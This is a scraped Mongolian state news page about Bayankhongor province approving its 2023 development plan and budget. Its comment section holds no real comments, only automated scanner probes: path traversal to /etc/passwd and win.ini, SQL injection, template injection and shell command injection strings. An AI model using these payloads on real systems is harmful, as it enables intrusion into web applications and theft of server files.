БАЯНХОНГОР: Аймгийн хөгжлийн 2023 оны төлөвлөгөө, төсвийг батлав

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-12-06 12:20:33
Холбоотой мэдээ
Сэтгэгдлүүд
 • ../../../../WEB-INF/web.xml;admin 185.234.72.114 55 өдөр

  123456
 • ../../../../WEB-INF/web.xml 185.234.72.114 55 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 185.234.72.114 55 өдөр

  123456
 • ../../../WEB-INF/web.xml 185.234.72.114 55 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 185.234.72.114 55 өдөр

  123456
 • ../../WEB-INF/web.xml 185.234.72.114 55 өдөр

  123456
 • ../WEB-INF/web.xml;admin 185.234.72.114 55 өдөр

  123456
 • ../WEB-INF/web.xml 185.234.72.114 55 өдөр

  123456
 • WEB-INF/web.xml;admin 185.234.72.114 55 өдөр

  123456
 • WEB-INF/web.xml 185.234.72.114 55 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',10)='z 185.234.72.114 55 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 185.234.72.114 55 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('e',0)='e 185.234.72.114 55 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:10 185.234.72.114 55 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 185.234.72.114 55 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 185.234.72.114 55 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 55 өдөр

  123456
 • ./../../../../../../Windows/win.ini 185.234.72.114 55 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(10))::text>'0 185.234.72.114 55 өдөр

  123456
 • ../../../../../../Windows/win.ini 185.234.72.114 55 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456'"\(
 • admin"and(select*from(select+sleep(10))a/**/union/**/select+1)=" 185.234.72.114 55 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456鎈'"\(
 • admin'and(select*from(select+sleep(10))a/**/union/**/select+1)=' 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1645173767')))>'0
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1529797303')))
 • admin"and"f"="w 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456/**/and/**/cast(md5('1788749529')as/**/int)>0
 • admin"and"s"="s 185.234.72.114 55 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456'and(select'1'from/**/cast(md5(1433504430)as/**/int))>'0
 • admin'and'e'='g 185.234.72.114 55 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  extractvalue(1,concat(char(126),md5(1298493930)))
 • admin'and'u'='u 185.234.72.114 55 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1728300398)))and"
 • admin 185.234.72.114 55 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('q',10)='q
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1870530118)))and'
 • admin 185.234.72.114 55 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('v',0)='v
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('q',10)
 • ..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('e',0)
 • .\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:10
 • ..\..\..\..\..\..\Windows\win.ini 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 185.234.72.114 55 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:10'/**/
 • admin 185.234.72.114 55 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 185.234.72.114 55 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(10))::text>'0
 • admin 185.234.72.114 55 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 185.234.72.114 55 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(10))>0/**/
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 55 өдөр

  123456
 • <%- 976456994+816858879 %> 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 55 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 55 өдөр

  123456
 • #set($c=947622686+914565764)${c}$c 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456"and(select*from(select+sleep(10))a/**/union/**/select+1)="
 • admin 185.234.72.114 55 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • ${(945383325+909859124)?c} 185.234.72.114 55 өдөр

  123456
 • %u2215etc%u2215passwd 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456'and(select*from(select+sleep(10))a/**/union/**/select+1)='
 • ${880775178+820481974} 185.234.72.114 55 өдөр

  123456
 • %2fetc%2fpasswd 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • /etc/passwdadmin 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  (select*from(select+sleep(10)union/**/select+1)a)
 • /*1*/{{894376327+885759056}} 185.234.72.114 55 өдөр

  123456
 • expr 899376416 + 899827964 185.234.72.114 55 өдөр

  123456
 • /etc/passwd 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin&set /A 981268443+898613237 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  <%- 802939507+985596757 %>
 • admin 185.234.72.114 55 өдөр

  #set($c=980472779+833402656)${c}$c
 • admin 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  ${(881803105+851652824)?c}
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 185.234.72.114 55 өдөр

  123456
 • admin$(expr 932391385 + 810363986) 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  ${801464831+934608571}
 • admin 185.234.72.114 55 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456
 • admin|expr 853319711 + 814040831 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456"and"w"="d
 • ./../../../../../../etc/passwd 185.234.72.114 55 өдөр

  123456
 • admin expr 938286527 + 998205854 185.234.72.114 55 өдөр

  123456
 • admin'"\( 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456"and"y"="y
 • ../../../../../../etc/passwdadmin 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  /*1*/{{931469175+920968077}}
 • admin 185.234.72.114 55 өдөр

  123456'and'g'='h
 • admin鎈'"\( 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  expr 998438924 + 856327438
 • admin 185.234.72.114 55 өдөр

  123456'and'm'='m
 • admin 185.234.72.114 55 өдөр

  123456&set /A 896495792+903945622
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1281657139')))>'0 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456$(expr 888477177 + 890511494)
 • ../../../../../../etc/passwd 185.234.72.114 55 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1482314078'))) 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456|expr 915221560 + 910663827
 • admin 185.234.72.114 55 өдөр

  ckdmrfrhhbfdwoxmbzpu
 • admin 185.234.72.114 55 өдөр

  123456 expr 837338501 + 824686512
 • admin/**/and/**/cast(md5('1911485857')as/**/int)>0 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456/**/and+1=9
 • admin 185.234.72.114 55 өдөр

  123456/**/and+1=1
 • admin'and(select'1'from/**/cast(md5(1261794142)as/**/int))>'0 185.234.72.114 55 өдөр

  123456
 • '-var_dump(md5(132710480))-' 185.234.72.114 55 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 55 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1176061634))) 185.234.72.114 55 өдөр

  123456
 • ${@var_dump(md5(103754570))}; 185.234.72.114 55 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 55 өдөр

  123456
 • ${981945852+863334561} 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  '-var_dump(md5(415583465))-'
 • admin"and/**/extractvalue(1,concat(char(126),md5(1071759261)))and" 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  ${@var_dump(md5(812017594))};
 • admin 185.234.72.114 55 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1335600068)))and' 185.234.72.114 55 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  ${873700912+903818397}
 • admin 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456
 • ckdmrfrhhbfdwoxmbzpu 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456
 • admin 185.234.72.114 55 өдөр

  123456
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 56 өдөр

  123456
 • ../../../../WEB-INF/web.xml 194.163.191.42 56 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 56 өдөр

  123456
 • ../../../WEB-INF/web.xml 194.163.191.42 56 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 194.163.191.42 56 өдөр

  123456
 • ../../WEB-INF/web.xml 194.163.191.42 56 өдөр

  123456
 • ../WEB-INF/web.xml;admin 194.163.191.42 56 өдөр

  123456
 • ../WEB-INF/web.xml 194.163.191.42 56 өдөр

  123456
 • WEB-INF/web.xml;admin 194.163.191.42 56 өдөр

  123456
 • WEB-INF/web.xml 194.163.191.42 56 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 56 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 56 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 56 өдөр

  123456
 • ./../../../../../../Windows/win.ini 194.163.191.42 56 өдөр

  123456
 • ../../../../../../Windows/win.ini 194.163.191.42 56 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 56 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 56 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 56 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 56 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 56 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 56 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 56 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 56 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 56 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 56 өдөр

  123456
 • admin'"\( 194.163.191.42 56 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 56 өдөр

  123456
 • admin鎈'"\( 194.163.191.42 56 өдөр

  123456
 • expr 976371994 + 805838198 194.163.191.42 56 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1212743588')))>'0 194.163.191.42 56 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 56 өдөр

  123456
 • admin&set /A 931340508+931437127 194.163.191.42 56 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1749340872'))) 194.163.191.42 56 өдөр

  123456
 • admin$(expr 872518245 + 932593613) 194.163.191.42 56 өдөр

  123456
 • admin/**/and/**/cast(md5('1964751322')as/**/int)>0 194.163.191.42 56 өдөр

  123456
 • %2fetc%2fpasswd 194.163.191.42 56 өдөр

  123456
 • admin|expr 838577101 + 929945529 194.163.191.42 56 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1938321526)as/**/int))>'0 194.163.191.42 56 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 56 өдөр

  123456
 • admin 194.163.191.42 56 өдөр

  <%- 977206796+944734214 %>
 • /etc/passwd 194.163.191.42 56 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1467296085))) 194.163.191.42 56 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 56 өдөр

  123456
 • admin 194.163.191.42 56 өдөр

  #set($c=902187916+973970425)${c}$c
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 56 өдөр

  123456
 • admin 194.163.191.42 56 өдөр

  ${(988177430+910065344)?c}
 • admin"and/**/extractvalue(1,concat(char(126),md5(1135669025)))and" 194.163.191.42 56 өдөр

  123456
 • ./../../../../../../etc/passwd 194.163.191.42 56 өдөр

  123456
 • admin 194.163.191.42 56 өдөр

  ${846512099+884578656}
 • admin 194.163.191.42 56 өдөр

  123456
 • admin 194.163.191.42 56 өдөр

  /*1*/{{819342343+958570974}}
 • admin'and/**/extractvalue(1,concat(char(126),md5(1237213189)))and' 194.163.191.42 56 өдөр

  123456
 • admin 194.163.191.42 56 өдөр

  123456'"\(
 • admin 194.163.191.42 56 өдөр

  123456鎈'"\(
 • ../../../../../../etc/passwdadmin 194.163.191.42 56 өдөр

  123456
 • admin expr 882953380 + 945179156 194.163.191.42 56 өдөр

  123456
 • ../../../../../../etc/passwd 194.163.191.42 56 өдөр

  123456
 • admin 194.163.191.42 56 өдөр

  expr 946949392 + 837492082
 • admin 194.163.191.42 56 өдөр

  '-var_dump(md5(315639518))-'
 • admin 194.163.191.42 56 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1063628208')))>'0
 • admin 194.163.191.42 56 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1499406056')))
 • admin 194.163.191.42 56 өдөр

  123456&set /A 918154736+922670132
 • admin 194.163.191.42 56 өдөр

  ${@var_dump(md5(394087870))};
 • admin 194.163.191.42 56 өдөр

  123456/**/and/**/cast(md5('1861427473')as/**/int)>0
 • admin 194.163.191.42 56 өдөр

  123456'and(select'1'from/**/cast(md5(1407134238)as/**/int))>'0
 • admin 194.163.191.42 56 өдөр

  123456$(expr 982297441 + 869909624)
 • admin 194.163.191.42 56 өдөр

  extractvalue(1,concat(char(126),md5(1871956184)))
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 56 өдөр

  123456
 • admin 194.163.191.42 56 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1807789456)))and"
 • <%- 909108589+936555351 %> 194.163.191.42 56 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 56 өдөр

  123456
 • '-var_dump(md5(333220719))-' 194.163.191.42 56 өдөр

  123456
 • admin 194.163.191.42 56 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1218442657)))and'
 • #set($c=858243966+894709146)${c}$c 194.163.191.42 56 өдөр

  123456
 • ${(967182182+989695019)?c} 194.163.191.42 56 өдөр

  123456
 • admin 194.163.191.42 56 өдөр

  123456
 • ${800157002+845453642} 194.163.191.42 56 өдөр

  123456
 • admin 194.163.191.42 56 өдөр

  123456
 • admin 194.163.191.42 56 өдөр

  123456|expr 939151069 + 993708359
 • ${915276108+815898674} 194.163.191.42 56 өдөр

  123456
 • admin 194.163.191.42 56 өдөр

  123456
 • /*1*/{{933183048+977399736}} 194.163.191.42 56 өдөр

  123456
 • admin 194.163.191.42 56 өдөр

  123456 expr 814284051 + 823451715
 • admin 194.163.191.42 56 өдөр

  ${801846882+890948226}
 • lvdjhhqhtliwicaqsuhe 194.163.191.42 56 өдөр

  123456
 • admin 194.163.191.42 56 өдөр

  123456
 • ${@var_dump(md5(514284950))}; 194.163.191.42 56 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 56 өдөр

  123456
 • admin 194.163.191.42 56 өдөр

  123456
 • admin 194.163.191.42 56 өдөр

  lvdjhhqhtliwicaqsuhe
 • admin 194.163.191.42 56 өдөр

  123456
 • admin 194.163.191.42 56 өдөр

  123456